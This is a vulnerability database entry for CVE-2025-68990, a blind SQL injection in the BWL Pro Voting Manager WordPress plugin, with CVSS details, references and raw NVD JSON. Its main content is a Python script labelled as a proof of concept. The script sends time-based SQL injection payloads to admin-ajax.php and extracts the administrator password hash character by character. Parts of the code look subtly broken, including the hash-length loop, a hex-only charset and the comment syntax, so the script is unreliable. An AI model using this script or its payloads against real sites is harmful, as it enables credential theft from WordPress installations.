CVE-2025-68990

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows Blind SQL Injection.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

BWL Pro Voting Manager <= 1.4.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-68990 Blind SQL Injection PoC
# Target: WordPress with BWL Pro Voting Manager plugin <= 1.4.9
#
# Usage: python cve-2025-68990.py -t http://target.com

import requests
import argparse
import time

def test_vulnerability(target_url):
    """Test if target is vulnerable to CVE-2025-68990"""
    
    # Vulnerable endpoint - WordPress AJAX handler
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Blind SQL Injection payload - time-based
    # This payload causes a 5-second delay if vulnerable
    payload = "1' AND (SELECT COUNT(*) FROM wp_users) > 0 AND SLEEP(5)---"
    
    data = {
        'action': 'bwl_vote',
        'post_id': payload,
        'vote_value': '1'
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Sending payload: {payload}")
    
    start_time = time.time()
    response = requests.post(endpoint, data=data, timeout=30)
    elapsed_time = time.time() - start_time
    
    if elapsed_time >= 5:
        print("[!] VULNERABLE - Time-based blind SQL injection confirmed")
        print(f"[!] Response time: {elapsed_time:.2f} seconds")
        return True
    else:
        print("[-] Not vulnerable or target is patched")
        return False

def extract_admin_hash(target_url):
    """Extract admin password hash using blind SQL injection"""
    
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    charset = '0123456789abcdef'
    admin_hash = ''
    
    print("[*] Extracting admin password hash...")
    
    for position in range(1, 65):  # MD5 hash is 32 chars
        for char in charset:
            # Extract character at specific position
            payload = f"1' AND SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{position},1)='{char}' AND SLEEP(2)---"
            
            data = {
                'action': 'bwl_vote',
                'post_id': payload,
                'vote_value': '1'
            }
            
            start_time = time.time()
            response = requests.post(endpoint, data=data, timeout=10)
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= 2:
                admin_hash += char
                print(f"[+] Position {position}: {char} (hash: {admin_hash})")
                break
    
    print(f"[!] Admin hash extracted: {admin_hash}")
    return admin_hash

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-68990 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    args = parser.parse_args()
    
    if test_vulnerability(args.target):
        print("[*] Attempting to extract admin password hash...")
        extract_admin_hash(args.target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68990
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68990
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68990/
[4] VulDB https://vuldb.com/cve/CVE-2025-68990
[5] https://patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-sql-injection-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68990", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:57.690", "lastModified": "2026-04-27T19:16:40.197", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows Blind SQL Injection.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}